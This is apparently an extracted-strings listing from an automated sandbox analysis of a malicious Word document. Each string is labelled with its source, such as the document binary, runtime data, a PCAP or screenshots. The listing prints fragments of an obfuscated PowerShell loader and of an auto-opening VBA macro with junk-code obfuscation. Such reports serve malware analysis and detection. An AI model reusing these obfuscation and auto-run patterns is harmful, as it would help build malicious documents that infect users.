19U'+'m+9UmxASDC);9Um'+'+9Um&(OQJ9Um+9UmIn9Um+9UmvoO9Um+9UmQJ+OQJ'+'kOQ9Um+9UmJ+OQJ9Um+9Ume-9Um+9UmIt9Um+9UmemOQJ)9Um+9Um(19Um+9UmxA9Um+9UmS9Um+9UmDC'+'9Um+9Um);9'+'Um+9Umbrea9Um+9Umk;}9Um+9Umcatch{9Um+9Um'+'}'+'}9Um) -rEplACe9UmftD'+'9Um,[CHAR]96-rEplACe ([C'+'HAR]57+'+'[CHAR]10'+'1+['+'CHAR]112),[CHAR]34 -'+'r'+'EplACe 9Um19'+'x9Um'+',[CHAR]92-CReplace '+' ([CHAR]79+[C'+'HAR]81+[C'+'HAR]74),[CHA'+'R]39 -CReplace 9Um1'+'xA9Um,'+'[CHAR]36) 6aj.( u'+'iCpShOMe[4]+uiCpsHome[34'+']+9Umx9Um)')-rePlAcE([cHar]57+[cHar]85+[cHar]109),[cHar]39 -CrepLacE 'uiC',[cHar]36 -rePlAcE ([cHar]54+[cHar]97+[cHar]106),[cHar]124))
Ansi based on Process Commandline
(powershell.exe)
PpAnkS(TwkqnSptjB380eSfQETc*5fyiETdIP11ebDjoC821O* UPivBw!%3490"3XrSbNYwTHwBtsUDDJ2wFc.l&%05443
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
pqzS+8120sAKpFdr2"* rRGZTLCQ4885rvtJj2vTioAzRarRfAajckcAdaYmm(pXTpXKivV%@/ 4999KMtDKK427$tPQPY"+2sdUojs
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
prnOutput.prn-
Unicode based on Memory/File Scan
(166520.exe
, 00047358-00002132.00000000.47862.00191000.00000002.mdmp)
ProductFiles
Unicode based on Runtime Data
(WINWORD.EXE
)
ProductNonBootFilesIntl_1033
Unicode based on Runtime Data
(WINWORD.EXE
)
Profected
Ansi based on Image Processing
(screen_8.png)
ProxyBypass
Unicode based on Runtime Data
(WINWORD.EXE
)
ProxyEnable
Unicode based on Runtime Data
(cosineinit.exe
)
ProxyOverride
Unicode based on Runtime Data
(cosineinit.exe
)
ProxyServer
Unicode based on Runtime Data
(cosineinit.exe
)
PSPUBWS-PC
Ansi based on PCAP Processing
(network.pcap)
PSzw&@(FCTUlz`RqbcE0G1Au}mKNpFB
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
Pt3RDA~xcccDB`wc
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
PudvSAZpbfA+DqMbkPCVbFTCFpzT42995p*iffXr 29268)LI0PCwcB88830BzEioZbp24371
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
PwtbtAaZZHrASz iUIEO4078nAQYaSWlERCsuq69061DJiVjG528r* JjpCSlq@'bzECTYcvD@,Autoopen(On Error ReBs NexDwnuHwAujzKh
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
q)Q:-MO=5}_KWVqnz>1Z]j>(
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
Q0G\jPs&'(d{kibeVBFN&9e&.[^P9(1 n;'C/j~'cSC}<43gdaUKgi>#]2;Zk4!(&y7.x3CvP]pt{B]nMj_*l,O Wqz4\@NiBSGXrI2'9f7^PMs"p|R)z@V\4/##''Wi'5_O)g{D8)RQ9<'O<{Q}VDE[[krW-SP%/O
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
qbuAGGRiOkzupUGpstwCIojFEkwEDEYuLQzMHQCHzicImjhBfV=mpIFvncFjJK&QovrpvIrrnd"TfBFz
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
QEhjejeher
Ansi based on PCAP Processing
(network.pcap)
QEv}kAP:RBR'qhB((((((((((((((((P3[qE4I"7Uu5\|=~!ToJ8OW5^/C6A+!?TaEJ**NSw<KE2B($($K@Q@Q@Q@Q@Q@Q@'0:Z(=;EQEQEQEQEQEQEQEQEQEQEQEQEQH'r*Z(
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
qfMBYAUnCo Hhjfl 33AQQmcR9O"aWS7903bmpvcE13AwQkLa2 Y43WGZpRi
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
qIuSn@129pN@jnk^Q!Q'LZSqzrP26082rpZUvwSpM8QsGwu<toQYGzrzcvvwlBVN
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
qk-|-g<^o,0T0#n+\WLeIR@a#p=:|;oISR4m.X!PX.xsyIi-;RC>V_i E;zvg[t4*b{;-Bc;lP=s_YxSh4t8C'9hze:F6a~Wz2AUW-mB^vN5ZIVny9o,4AI9H9$$\mn4
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
qltFWbbrUwKwhQiKjlfMyojWaqIpCHFdcuRazciEwvSVj+
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
QMWPujSG'kOqaWVA%NwAPulufQmLmRqbR/cddOYzR?lCVivWpSiKHCPiwGrCf*OJmsWFziikWriqphwdQYETmFnWTjMHWGjrDTfHSpBUGhkj8EvslbqfKWzDBfCrjIbJFRFPRMk}jzBLjd,dHBXKFUNcBwhXWKdlSmACgEqEajmqfMYTTAUnCBooHhjfl)QQmcRDwiWS0mpvcEAwQkLJWGZpRi>asjHJXSAZjXP*pDDaTSPpAnkSq~TwkqnVYSptjjpTSfQETcD;iETIP"DjoCX
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
QS b ,XX o X X' t "' & (? *} ,u.XX . 0)X 2 4X'$=ophGAttribute VB_Name = "izosJmiC"
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
QSwOWA(pWcAAQULja@&3113E(uzoS$dIB19(zwkJCfE(47063Bnzrfu83935(@Kczvdm(3022OBwXcA(FVfqX(qrnrjK(cYQzFCABIFNM+C vBjAJDsVAEtUkME@cTFpkw3377sUwQSdb79918!!XvpGqaI57392@CQvmIm310`* BTjHOwF19j`jIzvF
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
qswVbMzWmj<(WnQZRg`itkaR 71jHu!R
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
QW0L0ckW0O0B0
Ansi based on PCAP Processing
(network.pcap)
qwNfwZmLcDJdpJizk$(@JzzrPFPGNndq
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
qwplPPNVahnv
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
q~9358"RKwBpAJqcr
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
R,c_p_,ntt_pac_p_antL__t
Ansi based on Image Processing
(screen_4.png)
R,f,r,nc,_
Ansi based on Image Processing
(screen_8.png)
r11%bHYKFlwod% tesXYf%5rrrr$' '
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
R\OW0j0D0
Ansi based on PCAP Processing
(network.pcap)
r_a__aF_aIJ_
Ansi based on Image Processing
(screen_4.png)
Rage Italic
Unicode based on Runtime Data
(WINWORD.EXE
)
RanZst*jwvuWH^kThnAYdkhcqSVccuIBfifGIpTQGQjw-taqFb@sdIGzdVBlicsZnYwWhN$RtsozbkhWJUoFuuQhnmrhLjjwzprCjMDBsqHCChMURjzkT@inaNL'nriGSF}sBqBnspfiWkN[#PXzObwjGjlQqHinjntPbfNDF^KXautPnztSbsIwrbXAWYi=mRWdwinaHDcqNSOQMIkG"moBwJBPVScWj:azHoV~OTMGQZsWYY<FwfKvYiWMMjjzXklloYikkzf]QlYuV EjBntXdWUicolnmwH QLBqDsrNl6HbKnnqTtwzLPDHjBnBEhREOwUDhhcmGlot
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
rc0mpat_b____m0de_
Ansi based on Image Processing
(screen_8.png)
rccn_pat______.
Ansi based on Image Processing
(screen_4.png)
RdOvDAKRvcNp5
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
REbSiQtsimYAKURAv508378QirUEH>7
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
REListbox20W
Unicode based on Runtime Data
(WINWORD.EXE
)
RemoveMenu
Ansi based on PCAP Processing
(network.pcap)
Reverse(*"!IfaUpMQjG{EOPABAfDsPaL
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
RisETDerphfhQtFhPvTnvcVPnOHXLNYmLz$lClboXGRFEQxJHMYm2lOcjI6ocHjsCORiiJIhLqEdjvqpbDnMofSdjBZZCrlzfvbLjgoKuzmf?EsQSpiDvLwDDsGPRq/MYsjljEiTmBHV*UKbTjUAPPcjpIfjwDD[SfmlvKqJohGm-whVRzsWDXtiHULSuHBvj1HqLkvVSjBLWzAYzrqFaaCOYjzlFUpIjCcUBpK0PMijjPSGBNvIhTrYUkjLnzlWWDQzfNYh%RiTzT,]NaPLIclNUtiYrVYRzaviL\wcjSmCDFNoTZWVKNuvDwphLsNDXRHiUftWaYQfkXlWuiozAuulaJCijwZiwN{Sqdff%KzRFfw&KtUTfzJjaiL2twJJsRiAhrfacRsvkpdFCziPzTiRwIwnmoZIZwHcsnbAekhSiibHDDVDGshzzliYByzdJvIzzpiBXdbPjQrzYEpuoGc&DzknDPaiSMGjEVUXjlWBNcTOqzhjolOqKEHawjLinabzyLtbczArumErldmHzmwAKYUBDoPAlof]JmtKfQNUjTpWHKioOotoZc
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
RIwBU1QAGBSf
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
Rk01YWeW0~0W0_0
Ansi based on PCAP Processing
(network.pcap)
rKak0;bW0~0Y0
Ansi based on PCAP Processing
(network.pcap)
rKak0;bY0(
Ansi based on PCAP Processing
(network.pcap)
rkquEpwbjk@
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
RL0ckW0O0B0
Ansi based on PCAP Processing
(network.pcap)
rn)|*.prn|
Unicode based on Memory/File Scan
(166520.exe
, 00047358-00002132.00000000.47862.00191000.00000002.mdmp)
Rockwell Condensed
Unicode based on Runtime Data
(WINWORD.EXE
)
Rockwell Extra Bold
Unicode based on Runtime Data
(WINWORD.EXE
)
RpuUHXTcAHY
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
rqMrZ@(YKZjUcECKSBN7099WUHVW(1( FXCwA(33539zjCdd45861(IzRJC(2ewcJoXF' WFWCL'cNawKTwH@(DdT2swdMLdmXo% 3pKc53470y, NTnXnUHGTIo
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
RrRW0~0Y0
Ansi based on PCAP Processing
(network.pcap)
rrVlUBD#fWfv2YGsrtP`pJZwXjT6 AJEzaG# 96275"SiYVY89456KVjLIA1rWQZPhSwBkqBW
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
rstdole>stdoleP
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
rtXQXAREzJhfsVddbV"028A>u FrIKY25}RjsEOC;9595cUtHQjqA 99%*@ GPEBlF0402aPuuPBWOFzFa4f BZnrWRPRf CkMmpl`Mid(qltFWbbrUwKwh`#+ QiKjlfM, ojWaqIpCHFdcuR@B`zciEwvSVjCilFCCEGirwJjw@
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
RuDYLd(UuzVAASwmuIka466CnfC`48060
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
RusqwWVLvDTIdIiwmKKiBzNapzaifiQVqpwQXX<rvBKkyMtWmS
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
rVCNdTQfATY-kGJhQp75556O@lUZwbn>28463PoIqwGP39652AHbfEl6638OwvTOMwP23937PkvRQF0O cPBjJOEnd musHwkwosI(oXmdLMdsYfUoN As uingOn Error ResuNextlscbakuCGkl
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
RW0f0O0`0U0D0
Ansi based on PCAP Processing
(network.pcap)
RwuZiEuUQ"JbJH(CRfIMZqiN!
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
rYT<K.KR)n#n%OkDHt6=Bk'RF!)Iw#X'(Mss[/m9j~&tsN?%bJ}TUqVuiKRG/8Y\cax\$m%zQ{[?v<t>c3A#8 W<aj=zs#5&8PybP82N+hzIF5X@K91j=ake5R%FV!Apx0ZZj/3z}/d81c~Y!lT&c-Zj
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
rz'4u/9+9KXT)1sQg{Q^}__|5VO>\6qGl+Gi3?YRjX
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
r{_G,HMg2}ZUa=x,8YycuK#`>J!R9 AxM;V{_?*rpG#mLgFkX]2&x&>kR}Ex6}d5iU+>7bgR
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
s6VTGHTG% tGqjH2LX!!!!$'V Z'X ^ `(! b dxXX fM hX j lX'\ p'n t vj
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
S?,$Zn^VVVVVVVVVProject.HULSuHBvj.HqLkvVSjBLWProject.izosJmiC.wSTJsProject.izosJmiC.VCRPjlvProject.zTZADLcFXJtFRE.AutoopenProject.izosJmiC.wQpJmProject.izosJmiC.tGYJQProject.izosJmiC.zPHvPqrDOGFFzXProject.izosJmiC.SmZcwProject.izosJmiC.kOjwcPROJECT.IZOSJMIC.KOJWCPROJECT.IZOSJMIC.SMZCWPROJECT.IZOSJMIC.TGYJQPROJECT.IZOSJMIC.WQPJMPROJECT.IZOSJMIC.WSTJSPROJECT.IZOSJMIC.VCRPJLVPROJECT.HULSUHBVJ.HQLKVVSJBLWPROJECT.IZOSJMIC.ZPHVPQRDOGFFZXPROJECT.ZTZADLCFXJTFRE.AUTOOPEN@@UnknownG*AxTimes New Roman5Symbol3.*CxArial7.@Calibri5&.[`)TahomaC.,{ @Calibri LightACambria Math"hee!r0@P$Pn^6!xxIOh+'0d
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
S_Jeh,S_Je
Ansi based on Image Processing
(screen_8.png)
Sakkal Majalla
Unicode based on Runtime Data
(WINWORD.EXE
)
SavedLegacySettings
Unicode based on Runtime Data
(cosineinit.exe
)
SBSq/= RzJKH
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
Script MT Bold
Unicode based on Runtime Data
(WINWORD.EXE
)
sctls_updown32
Unicode based on Memory/File Scan
(166520.exe
, 00047358-00002132.00000000.47862.00191000.00000002.mdmp)
Segoe Print
Unicode based on Runtime Data
(WINWORD.EXE
)
Segoe Script
Unicode based on Runtime Data
(WINWORD.EXE
)
Segoe UI Light
Unicode based on Runtime Data
(WINWORD.EXE
)
Segoe UI Semibold
Unicode based on Runtime Data
(WINWORD.EXE
)
Segoe UI Symbol
Unicode based on Runtime Data
(WINWORD.EXE
)
Sg0M0~0[0
Ansi based on PCAP Processing
(network.pcap)
SHaevae71615SHaevaecy96784SHaevaecyvesho12012.+,04
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
SHaevae80806SHaevaecyveshofolae49241
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
sHiwkDEW6ZZJqm4tBp1^74},!`"a1"@hzjsfJkzwQuV
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
Shonar Bangla
Unicode based on Runtime Data
(WINWORD.EXE
)
Showcard Gothic
Unicode based on Runtime Data
(WINWORD.EXE
)
Simplified Arabic
Unicode based on Runtime Data
(WINWORD.EXE
)
Simplified Arabic Fixed
Unicode based on Runtime Data
(WINWORD.EXE
)
SimSun-ExtB
Unicode based on Runtime Data
(WINWORD.EXE
)
sJmwrY tvOwd
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
Sk0&Ny0f0h
Ansi based on PCAP Processing
(network.pcap)
SL0Nckg0Y0
Ansi based on PCAP Processing
(network.pcap)
sListView32
Unicode based on Memory/File Scan
(166520.exe
, 00047358-00002132.00000000.47862.00191000.00000002.mdmp)
Snap ITC
Unicode based on Runtime Data
(WINWORD.EXE
)
SNvjhVSMiqFw
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
SoClboX(GRFE!XJHMYmlOcjI
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
SpellingAndGrammarFiles_1033
Unicode based on Runtime Data
(WINWORD.EXE
)
SpellingAndGrammarFiles_1036
Unicode based on Runtime Data
(WINWORD.EXE
)
SpellingAndGrammarFiles_3082
Unicode based on Runtime Data
(WINWORD.EXE
)
SqfOR!cBJZxSFtVNwN@H/ :GXjDU"@20&Q TwzsIE28108ZFGff2638! 4Ln:3S:zW0SjJQ% ?LKUKjPWqjNAcd;07zsP$+]4[emOHsp$ ( .ta9.`3684N1Aa3b, E11N`hMcobpmUQrU
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
SQQFY(7uQGmbTbotjvPSs
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
SQu.EozMFTWzaojzGLMGX3&3&3&3&$'X ' 9 T cXX !X X'@
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
sRCFDzprwV+
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
Srye.T1%$rf 9]m/m;Pr-qmp8e
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
sSXzHN(bhVZKVPDnCk`68030;OVIHH;37582(nBaUq9634c@rtdawG52135@;RKhJb
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
stdole`Project-ThisDocument<_EvaluateNormalOfficeuDocumentjzTZADLcFXJtFREGuJqoJpuIvtSfWYTPG<NfmOGUlKuOrzhISt$MKOVLlQzuPmq)kbHukTejNjBO]qNFaHudJaQNjqQicmVO>BYJoKKiIfwim$lopfK|{mRhiW4LjTjDOMkrMhQSUnTBuUj1zbozbioTumDwlYbhlCiGZMaRmJmoo;"ruGmcH sndOl_tIcSnzu_aUPkBzwYhkAPuVUiVuYjTvzp]nTVotWfWlij\LCdzbMJztozYtTmLOALkNOLVSLhiwzIiztQSwOW%pWcAtQULjaXuzoSdIzwkJCfnBnzrfuvKczvdmOBwXcAnFVfqXCqrnrjKcYQzFC5BIFNM1CvBjAJqSsVAEtUkMEcTFpkw2sUwQSdlvpGqaI7CQvmImBTjOwFajjIzvFaiDYuFSTqVn\DfRGEPwtbt?ZZHrAjziUIEOnAQYaSCERCsuq"PDJiVjGZJjpli(|rjKbzvCTYcvDpAutoopen*wnuHwn5ujzKhwOucKHhDKJkO_EAqJsl>UWmhnTLjztnYvRAWudJsLiEGZfYb'IuXzPk
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
StringFileInfo
Unicode based on Memory/File Scan
(166520.exe
, 00047358-00002132.00000000.47862.00191000.00000002.mdmp)
StrReverse
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
Sub HqLkvVSjBLW()
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
Sub sVdSGF(PhpwT)
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
Sub VIAJOC(BwfLOI)
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
sWpHhLJcnuA-mJvvN808094OuIwjCQO29665OOMbhz!O8851OUavTI59325OuMpYuO 93545ODt0aXZB0OtpnqaObXSsKjjnooiRQpJm("cRkY soLFNFiN dw4kmS1813G54137)zwAFz&OoUAt
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
sXnOYfp%7959C_wpDXFY85291fwumRn
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
SYljbX(mOvZAzHirjzQBA28827FAPozbPw>8760*UtiMOrP988=caVQkud 17490QIrwmPk4258QAqpjd0%KRdhJtP`rqYwXIVi7LLkVNwWksWbmhl % t7w8246813+, 15DqnjriJizQUq
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
SysListView32
Unicode based on Memory/File Scan
(166520.exe
, 00047358-00002132.00000000.47862.00191000.00000002.mdmp)
Sz+S9%c?o}GH-(ws:p.?J[akg
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
T tNmqd(KUKT@XsJakD16012yhPDwLk<`51920/<h`zitjl@-12041BHwJT32358=mdzuaOA
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
T$D;D$4w\
Ansi based on PCAP Processing
(network.pcap)
t@a8^.VJR?Qa+\Oc
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
Tc0f0D0j0D0
Ansi based on PCAP Processing
(network.pcap)
TdLY(PZQmLAgAs14623@JcgjCiCI6421FgrJzVl@74bKBESf8!KQjqTBt19!gDDDz
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
tdWGzM(szzHtc / hCdBu60563Fix(iXLof)) + 7886 - CLng(JXYOGS
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
Tempus Sans ITC
Unicode based on Runtime Data
(WINWORD.EXE
)
theme/theme/_rels/themeManager.xml.relsPK]<?.xy version="1.0" encoding="UTF-8" standalone="yes"?>
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
Times New Roman
Unicode based on Runtime Data
(WINWORD.EXE
)
tiQwRHh=%@zNafst4p6084@a, %mNjOaaUXWtt
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
tKTwcDi04p}XniG134ArIEnoI2ZnhfjyAjCpwB
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
tlzjqa1582HIidZ2ab13$KsYaiA645A_QiEamz76961XbizsD7682b0DBrJAsuAOb dUbwaH@AmiVCT
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
TmBHV@UKbTjU1972APPcjpe?0f4fjE|423c4fmlvA|69JohG2mu65}1
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
Traditional Arabic
Unicode based on Runtime Data
(WINWORD.EXE
)
Translation
Unicode based on Memory/File Scan
(166520.exe
, 00047358-00002132.00000000.47862.00191000.00000002.mdmp)
Trebuchet MS
Unicode based on Runtime Data
(WINWORD.EXE
)
tRn6Ns$f`7I&?Sffk&mwL#wQQS{KX!:io|mn3$0X2
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
tThBtb = SvSMo
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
Tw Cen MT
Unicode based on Runtime Data
(WINWORD.EXE
)
Tw Cen MT Condensed
Unicode based on Runtime Data
(WINWORD.EXE
)
Tw Cen MT Condensed Extra Bold
Unicode based on Runtime Data
(WINWORD.EXE
)
TX X' ' J RN ^XX 6 "eX $ &X'\ ^it.wes&&w^o=pJz56$'( ,'* 0 2q 4AF 6XX 8
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
TXX 6F 8P~X : <X',X @'> D F HTr JZXX L7_ NX P RX'Bi` Z'X ^ ` b d!XX fr hFX j lX'\' p'n t v"K x2 zXX | ~)X X'rb.8Z ' + Z XX Yp ][X X' ' 1 nXX u fX X' i ' KQ ,XX rg leX X' ' W7 3 6XX yX X'Xi.%@S5i V/ %^c^EzK;;;;$' ' U: 3[XX bK +X X''X ' x TY tXX #1X X',74Ep^S^m^ojf@llll$'
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
u/L&{!lcl&s^E]A5u~1g{@"`F)[s)[#6/\G6cw(#h,;_k73U1:N+<Z(
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
U0Wifd$Kit.wAw^o=pJz560697+ J#n"bDbQj qZzIDtoBXZSfokzjhiA29q$jGfzh3dcaYAmT
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
u4@LBjp$cAp50* TlfEv7405jSYZD@wnCKuX
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
u6KB#_vz~gz3NH/da1glQ@?}=n'N:x{Dy=v_oS8kG[sm>lGf=c-|s
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
ucGjY (sAAudOpqqEZ@
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
uHZzwCEKUaprJDOa5347JqTkJ2227|tooRWqq!6628|MijI+ 9251* jJtpE"N889bOMEuQopnvJQ
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
uIpNwjvi=75, 75, 1435, 743,
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
uIvtSiIfwimcYQzFCvzDYBBHwnuQGarU01Y
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
ujj%bz|ag9|<kxRX~b-PC|!y5-bKID5q
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
uMkUH(YMHEvAjKbXHX60480Fix(WtYaRY50986PSrYDwio;40718 DnOFX96340yZdQDHy54232yoKiRYS1AtqRzSPM BJkOrIRQYjQBdEVcQpbiimJ@pqmJNu51Qjcrbi>1760PTNOmwQP20585JVoljLA64293QWbPBQQ6119QLomER4APMttXKPupLfisAzi@%DespnZBf%!!%RsCO ukicie31h8415, eRQAMCdnZJu
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
UMWrAHbUaicddrpmoVqWMOhSpCi6u (.ja6 )sRAHC[0,5 ecalpeRstRQ`,)47]CP[+189rC[( 29!C[,PP9C eCAlpE`r0- 43@)211]c#3h10512 ,2 %18FdpQzOQVmNKWv
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
UNCAsIntranet
Unicode based on Runtime Data
(WINWORD.EXE
)
UPivBwFXrSbNYwTHwBtsUDDJitRhYQQJrhdAqJBVYaXJUhcqo;SfnVuYKEbwBXkj\fKobWavjbB}orkXz*jWmELDLiDUAqrTXdVLzcrZavjNbJPbXbz>IASBuRLFpzaQUivoEgOLwJkRAMzoLVUwiYRNUvvXphj>WjjtpTDSGIPrKNWlUgJBHVtrSGKvzo?FfBMtENptTJ^|OSfpbfZWJsbplcps.qiTAkE*IoLNdUUUPpj9FrUSpqSNvjhVSMiqFwnIhzGNEV bAYlptYJAGLp!_vOEVSHKOKCaLjjowa9xWzsjOXiPcIlBslOTNhiDbVWb@mNjOa(wUXWttirGdjsozrjmwDdtbirDh0aIOdJrzIWi4BtvOCWluhzQWlpjSMlHisAZ4MnREwPaJliTCVboucEdciAiQY6@rwvzzrzzdIJJJTjUFmkuzoGdnKYZjKpjjBpzzPUTjChvzqmAkSWEVfFTCHqHDClzMKpHXjclqmOWluKp%iVabFr"
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
UpJataLahal_
Ansi based on Image Processing
(screen_4.png)
uQAuA3moDYX
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
UqMcbtRa6543ARMpuszV##zpYkToPa2k`jmSULQ
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
USER32.dll
Ansi based on PCAP Processing
(network.pcap)
uW0~0W0_0
Ansi based on PCAP Processing
(network.pcap)
UwQwjLoXpbnm/PJHhSw`24920CdnkJ|90541PbirYCvP74157 fWjmN81529PjWnJtkQ46208QKjiRvn1AQwCpwvQEnd Sub
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
V$@s.smG$i;<3i[Bm U+UXkpGoc)vb#?3'>~ONHi'=z^(0CYs_C}VPj*\c-q8|.et{6
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
V@GlobalSpaclFalseCreatablPredeHclaIdTru
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
VBAFiles
Unicode based on Runtime Data
(WINWORD.EXE
)
ve\GJAw1CoOj7~spEsAegk46qYf#DN#EWtq=~b]9r:8,5;"(,!mS3m:o
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
VersionCompatible32="393222000"
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
vfrMRtjSaVBtVInzj108940CZvXL6842gQSQ18436BwKHnwL`927* UZwzve9194FQvXcaB@SRuhuM@JPimhzLJTckOfWrnZBf% tes&&r^e=%Sf.W,3545u!e65a3D1Gb
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
vfR{Zm|wL3g#TF]OIZ<K6Le/DGdQYO|1!]B$hVk_
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
VFzQF`3119WDRoX 72773wuRHknYqjiZKSpWMfD4vv0vssBOBL!JA76976@$BCtidBbOtYhs
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
Vi7LLkVNwWksWbmhl% t7wL L L L $'x
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
ViFQic dowlFKYHDjhPL@PFpRWWzPHvPqrDO GFFzXItVWakEMIAAA6sRCFDwmk+ RusqwWVLvDTIQUKjPWqj&N1$+ F+ ljaakrr@ZWhhiPzoPEoHkRptMMvPYQQp+ S+ LshK!:+ w dBSwU0JHpwdEsFLpHcUuaI@cwAkETD ANzhppwCffb+aYof@qzcWsEPUMWrAHbUZiFiTzufdJWjr
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
Viner Hand ITC
Unicode based on Runtime Data
(WINWORD.EXE
)
Vladimir Script
Unicode based on Runtime Data
(WINWORD.EXE
)
VPdkoaGizFU zjsuLa!6420Ehwzww52oBbBwQ7476ceICzIr@@2!QdNSiR!e22492b2Oj0QiqcBZQilljRccwGTKaV
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
vpzrC(dnYzSo /@ LZDwv617/ Fix(wcMOuZ)B)1964CLng(SAsTj69846A#ALwBq22682 * BPTjwCStr(51368)`kmJjNRA=djzcpocTvjwpnRYv
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
